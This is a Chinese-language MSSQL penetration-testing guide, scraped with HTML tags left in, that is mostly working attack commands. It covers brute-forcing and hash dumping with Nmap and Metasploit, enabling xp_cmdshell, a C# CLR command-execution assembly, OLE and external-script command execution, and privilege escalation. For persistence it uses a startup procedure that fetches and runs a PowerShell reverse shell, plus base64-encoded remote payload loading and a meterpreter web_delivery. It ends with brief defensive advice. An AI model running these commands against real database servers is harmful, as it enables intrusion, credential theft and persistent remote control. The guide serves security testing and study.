MSSQL攻防技术全面指南<\/h1>

一、基础信息探测<\/h2>

1. 使用Nmap进行扫描<\/h3>
# 查找MSSQL相关的NSE脚本<\/span>
<\/span><\/span>locate *.nse | grep ms-sql
<\/span><\/span>
<\/span><\/span># 扫描MSSQL版本信息<\/span>
<\/span><\/span>nmap -p 1433<\/span> --script ms-sql-info 192.168.3.130
<\/span><\/span>
<\/span><\/span># 暴力破解MSSQL账号<\/span>
<\/span><\/span>nmap -p1433 --script ms-sql-brute --script-args userdb=<\/span>users.txt,passdb=<\/span>pass.txt 192.168.3.130
<\/span><\/span>
<\/span><\/span># 通过NetBIOS枚举信息<\/span>
<\/span><\/span>nmap -p1433 --script ms-sql-ntlm-info 192.168.3.130
<\/span><\/span>
<\/span><\/span># 转储密码哈希<\/span>
<\/span><\/span>nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=<\/span>sa,mssql.password=<\/span>admin 192.168.3.130
<\/span><\/span>
<\/span><\/span># 枚举数据库表<\/span>
<\/span><\/span>nmap -p1433 --script ms-sql-tables --script-args mssql.username=<\/span>sa,mssql.password=<\/span>admin 192.168.3.130
<\/span><\/span><\/code><\/pre>2. 使用Metasploit进行扫描<\/h3>
# 定位MSSQL服务器<\/span>
<\/span><\/span>use auxiliary\/scanner\/mssql\/mssql_ping
<\/span><\/span>set rhosts 192.168.3.0\/24
<\/span><\/span>set threads 255<\/span>
<\/span><\/span>exploit
<\/span><\/span>
<\/span><\/span># 密码破解<\/span>
<\/span><\/span>use auxiliary\/scanner\/mssql\/mssql_login
<\/span><\/span>set rhosts 192.168.3.130
<\/span><\/span>set user_file users.txt
<\/span><\/span>set pass_file pass.txt
<\/span><\/span>set verbose false
<\/span><\/span>exploit
<\/span><\/span>
<\/span><\/span># 获取版本信息<\/span>
<\/span><\/span>use auxiliary\/admin\/mssql\/mssql_sql
<\/span><\/span>set rhosts 192.168.3.130
<\/span><\/span>set username sa
<\/span><\/span>set password admin
<\/span><\/span>exploit
<\/span><\/span>
<\/span><\/span># 枚举MSSQL信息<\/span>
<\/span><\/span>use auxiliary\/admin\/mssql\/mssql_enum
<\/span><\/span>set rhosts 192.168.3.130
<\/span><\/span>set username sa
<\/span><\/span>set password admin
<\/span><\/span>exploit
<\/span><\/span>
<\/span><\/span># 用户枚举<\/span>
<\/span><\/span>use auxiliary\/admin\/mssql\/mssql_enum_sql_login
<\/span><\/span>set rhosts 192.168.3.130
<\/span><\/span>set username sa
<\/span><\/span>set password admin
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>二、命令执行技术<\/h2>
1. xp_cmdshell<\/h3>
-- 检查是否为DBA权限
<\/span><\/span><\/span><\/span>SELECT<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>);
<\/span><\/span>
<\/span><\/span>-- 检查xp_cmdshell是否存在
<\/span><\/span><\/span><\/span>SELECT<\/span> COUNT<\/span>(*<\/span>) FROM<\/span> master.dbo.sysobjects WHERE<\/span> xtype=<\/span>'x'<\/span> AND<\/span> name=<\/span>'xp_cmdshell'<\/span>
<\/span><\/span>
<\/span><\/span>-- 启用xp_cmdshell
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>, 1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>
<\/span><\/span>-- 执行命令
<\/span><\/span><\/span><\/span>EXEC<\/span> master..xp_cmdshell 'whoami'<\/span>;
<\/span><\/span>
<\/span><\/span>-- 禁用xp_cmdshell
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>, 0<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span><\/code><\/pre>2. 使用sqsh工具执行命令<\/h3>
sqsh -S 192.168.3.130 -U sa -P "admin"<\/span>
<\/span><\/span>EXEC sp_configure 'show advanced options'<\/span>, 1;
<\/span><\/span>EXEC sp_configure 'xp_cmdshell'<\/span>, 1;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>go
<\/span><\/span>xp_cmdshell 'whoami'<\/span>;
<\/span><\/span>go
<\/span><\/span><\/code><\/pre>3. 使用mssqlclient.py连接<\/h3>
python3 mssqlclient.py administrator:123456@192.168.3.129 -port 1433<\/span> -windows-auth
<\/span><\/span>enable_xp_cmdshell
<\/span><\/span>xp_cmdshell "net user"<\/span>
<\/span><\/span><\/code><\/pre>三、权限提升技术<\/h2>
1. 从db_owner到sysadmin<\/h3>
use auxiliary\/admin\/mssql\/mssql_escalate_dbowner
<\/span><\/span>set rhosts 192.168.3.130
<\/span><\/span>set username test1
<\/span><\/span>set password admin@123
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>2. 模拟其他用户提权<\/h3>
use auxiliary\/admin\/mssql\/mssql_escalate_execute_as
<\/span><\/span>set rhosts 192.168.3.130
<\/span><\/span>set username test1
<\/span><\/span>set password admin@123
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>3. 滥用Trustworthy属性(db_owner提权)<\/h3>
-- 检查数据库可信属性
<\/span><\/span><\/span><\/span>select<\/span> name,is_trustworthy_on from<\/span> sys.databases
<\/span><\/span>
<\/span><\/span>-- 激活可信属性
<\/span><\/span><\/span><\/span>ALTER<\/span> DATABASE<\/span> [ignite] SET<\/span> TRUSTWORTHY ON<\/span>
<\/span><\/span>
<\/span><\/span>-- 模拟dbo用户
<\/span><\/span><\/span><\/span>EXECUTE<\/span> AS<\/span> USER<\/span> =<\/span> 'dbo'<\/span>;
<\/span><\/span>SELECT<\/span> system_user<\/span>;
<\/span><\/span><\/code><\/pre>四、高级攻击技术<\/h2>
1. CLR程序集执行命令<\/h3>
\/\/ C#代码示例<\/span>
<\/span><\/span>using<\/span> System;
<\/span><\/span>using<\/span> System.Data;
<\/span><\/span>using<\/span> System.Data.SqlClient;
<\/span><\/span>using<\/span> System.Data.SqlTypes;
<\/span><\/span>using<\/span> Microsoft.SqlServer.Server;
<\/span><\/span>using<\/span> System.IO;
<\/span><\/span>using<\/span> System.Diagnostics;
<\/span><\/span>using<\/span> System.Text;
<\/span><\/span>
<\/span><\/span>public<\/span> partial<\/span> class<\/span> StoredProcedures<\/span>
<\/span><\/span>{
<\/span><\/span>    [Microsoft.SqlServer.Server.SqlProcedure]<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> cmd_exec(SqlString execCommand)
<\/span><\/span>    {
<\/span><\/span>        Process proc = new<\/span> Process();
<\/span><\/span>        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"<\/span>;
<\/span><\/span>        proc.StartInfo.Arguments = string<\/span>.Format(@" \/C {0}"<\/span>, execCommand.Value);
<\/span><\/span>        proc.StartInfo.UseShellExecute = false<\/span>;
<\/span><\/span>        proc.StartInfo.RedirectStandardOutput = true<\/span>;
<\/span><\/span>        proc.Start();
<\/span><\/span>
<\/span><\/span>        SqlDataRecord record<\/span> = new<\/span> SqlDataRecord(new<\/span> SqlMetaData("output"<\/span>, SqlDbType.NVarChar, 4000<\/span>));
<\/span><\/span>        SqlContext.Pipe.SendResultsStart(record);
<\/span><\/span>        record.SetString(0<\/span>, proc.StandardOutput.ReadToEnd().ToString());
<\/span><\/span>        SqlContext.Pipe.SendResultsRow(record);
<\/span><\/span>        SqlContext.Pipe.SendResultsEnd();
<\/span><\/span>        proc.WaitForExit();
<\/span><\/span>        proc.Close();
<\/span><\/span>    }
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>-- 启用CLR集成
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'clr enabled'<\/span>, 1<\/span>;
<\/span><\/span>RECONFIGURE
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 创建程序集
<\/span><\/span><\/span><\/span>CREATE<\/span> ASSEMBLY shell FROM<\/span> 'c:\temp\shell.dll'<\/span> WITH<\/span> PERMISSION_SET =<\/span> UNSAFE;
<\/span><\/span>
<\/span><\/span>-- 创建存储过程
<\/span><\/span><\/span><\/span>CREATE<\/span> PROCEDURE<\/span> [dbo].[cmd_exec] @<\/span>execCommand NVARCHAR (4000<\/span>) AS<\/span> EXTERNAL<\/span> NAME [shell].[StoredProcedures].[cmd_exec];
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 执行命令
<\/span><\/span><\/span><\/span>EXEC<\/span> [dbo].[cmd_exec] 'whoami'<\/span>
<\/span><\/span><\/code><\/pre>2. 使用SP_OACREATE执行命令<\/h3>
-- 检查OLE自动化是否开启
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'Ole Automation Procedures'<\/span>; 
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 开启OLE自动化
<\/span><\/span><\/span><\/span>sp_configure 'show advanced options'<\/span>, 1<\/span>; 
<\/span><\/span>GO<\/span> 
<\/span><\/span>RECONFIGURE; 
<\/span><\/span>GO<\/span> 
<\/span><\/span>sp_configure 'Ole Automation Procedures'<\/span>, 1<\/span>; 
<\/span><\/span>GO<\/span> 
<\/span><\/span>RECONFIGURE; 
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 执行命令(无回显)
<\/span><\/span><\/span><\/span>declare<\/span> @<\/span>shell int exec<\/span> sp_oacreate 'wscript.shell'<\/span>,@<\/span>shell output<\/span> exec<\/span> sp_oamethod @<\/span>shell,'run'<\/span>,null<\/span>,'C:\\Windows\\System32\\cmd.exe \/c whoami \/all > C:\\Users\\Administrator\\Desktop\\1.txt'<\/span>;
<\/span><\/span><\/code><\/pre>3. 使用外部脚本执行命令<\/h3>
-- 检查外部脚本是否启用
<\/span><\/span><\/span><\/span>sp_configure 'external scripts enabled'<\/span>
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 启用外部脚本
<\/span><\/span><\/span><\/span>EXECUTE<\/span> sp_configure 'external scripts enabled'<\/span>, 1<\/span>;
<\/span><\/span>GO<\/span>
<\/span><\/span>RECONFIGURE;
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 执行Python命令
<\/span><\/span><\/span><\/span>EXECUTE<\/span> sp_execute_external_script @<\/span>language<\/span> =<\/span> N'Python'<\/span>, @<\/span>script =<\/span> N'print(__import__("os").system("ipconfig"))'<\/span>
<\/span><\/span>
<\/span><\/span>-- 执行R脚本
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_execute_external_script
<\/span><\/span>@<\/span>language<\/span>=<\/span>N'R'<\/span>,
<\/span><\/span>@<\/span>script=<\/span>N'OutputDataSet <- data.frame(system("cmd.exe \/c ipconfig",intern=T))'<\/span>
<\/span><\/span>WITH<\/span> RESULT<\/span> SETS<\/span> (([cmd_out] text));
<\/span><\/span>GO<\/span>
<\/span><\/span><\/code><\/pre>五、权限维持技术<\/h2>
1. 使用存储过程进行权限维持<\/h3>
-- 创建存储过程
<\/span><\/span><\/span><\/span>USE master
<\/span><\/span>GO<\/span>
<\/span><\/span>CREATE<\/span> PROCEDURE<\/span> test_sp
<\/span><\/span>AS<\/span>
<\/span><\/span>EXEC<\/span> master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString(\"http:\/\/192.168.3.133:8081\/Invoke-PowerShellTcpOneLine.ps1\")"'<\/span>
<\/span><\/span>GO<\/span>
<\/span><\/span>
<\/span><\/span>-- 设置为启动时执行
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_procoption @<\/span>ProcName =<\/span> 'test_sp'<\/span>, @<\/span>OptionName =<\/span> 'startup'<\/span>, @<\/span>OptionValue =<\/span> 'on'<\/span>;
<\/span><\/span>
<\/span><\/span>-- 查询启动存储过程
<\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> sysobjects WHERE<\/span> type<\/span> =<\/span> 'P'<\/span> AND<\/span> OBJECTPROPERTY(id, 'ExecIsStartUp'<\/span>) =<\/span> 1<\/span>;
<\/span><\/span><\/code><\/pre>六、其他实用技术<\/h2>
1. 通过HTTP加密代理建立TCP连接<\/h3>
python2 abpttsclient.py -u "http:\/\/192.168.3.13:84\/abptts.aspx"<\/span> -c webshell\c<\/span>onfig.txt -f 127.0.0.1:143\/192.168.3.13:1433
<\/span><\/span><\/code><\/pre>2. 远程加载PowerShell脚本<\/h3>
$text = "IEX (New-Object Net.WebClient).DownloadString('http:\/\/192.168.3.1\/Get-PassHashes.ps1');Get-PassHashes;"<\/span>
<\/span><\/span>$Bytes = [System.Text.Encoding]<\/span>::Unicode.GetBytes($Text)
<\/span><\/span>$EncodedText =[Convert]<\/span>::ToBase64String($Bytes)
<\/span><\/span>$EncodedText > bs64.txt
<\/span><\/span><\/code><\/pre>-- 执行Base64编码的PowerShell命令
<\/span><\/span><\/span><\/span>exec<\/span> master..xp_cmdshell 'powershell -exec bypass -encodedcommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADMALgAxAC8ARwBlAHQALQBQAGEAcwBzAEgAYQBzAGgAZQBzAC4AcABzADEACgAnACkAOwBHAGUAdAAtAFAAYQBzAHMASABhAHMAaABlAHMAOwA='<\/span>;
<\/span><\/span><\/code><\/pre>3. 使用crackmapexec调用web_delivery模块<\/h3>
# MSF启动web_delivery模块<\/span>
<\/span><\/span>use exploit\/multi\/script\/web_delivery
<\/span><\/span>set target 2<\/span>
<\/span><\/span>set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>set lhost 192.168.3.133
<\/span><\/span>exploit
<\/span><\/span>
<\/span><\/span># crackmapexec执行<\/span>
<\/span><\/span>crackmapexec mssql 192.168.3.129 -u 'administrator'<\/span> -p '123456'<\/span> -M web_delivery -o URL=<\/span>http:\/\/192.168.3.133:8080\/9SwSSB2rIZOWEP
<\/span><\/span><\/code><\/pre>七、防御建议<\/h2>

禁用不必要的存储过程如xp_cmdshell、OLE自动化等<\/li>
限制数据库可信属性(TRUSTWORTHY)<\/li>
严格控制CLR程序集的使用<\/li>
使用强密码策略，特别是sa账户<\/li>
定期审计数据库权限和用户角色<\/li>
监控异常登录和命令执行行为<\/li>
及时安装MSSQL安全补丁<\/li>
限制网络访问，仅允许必要IP连接<\/li>
<\/ol>
本指南涵盖了MSSQL渗透测试中的主要技术点，从基础信息收集到高级权限提升和维持技术，为安全研究人员提供了全面的参考。在实际测试中，应根据目标环境选择合适的技术组合。<\/p>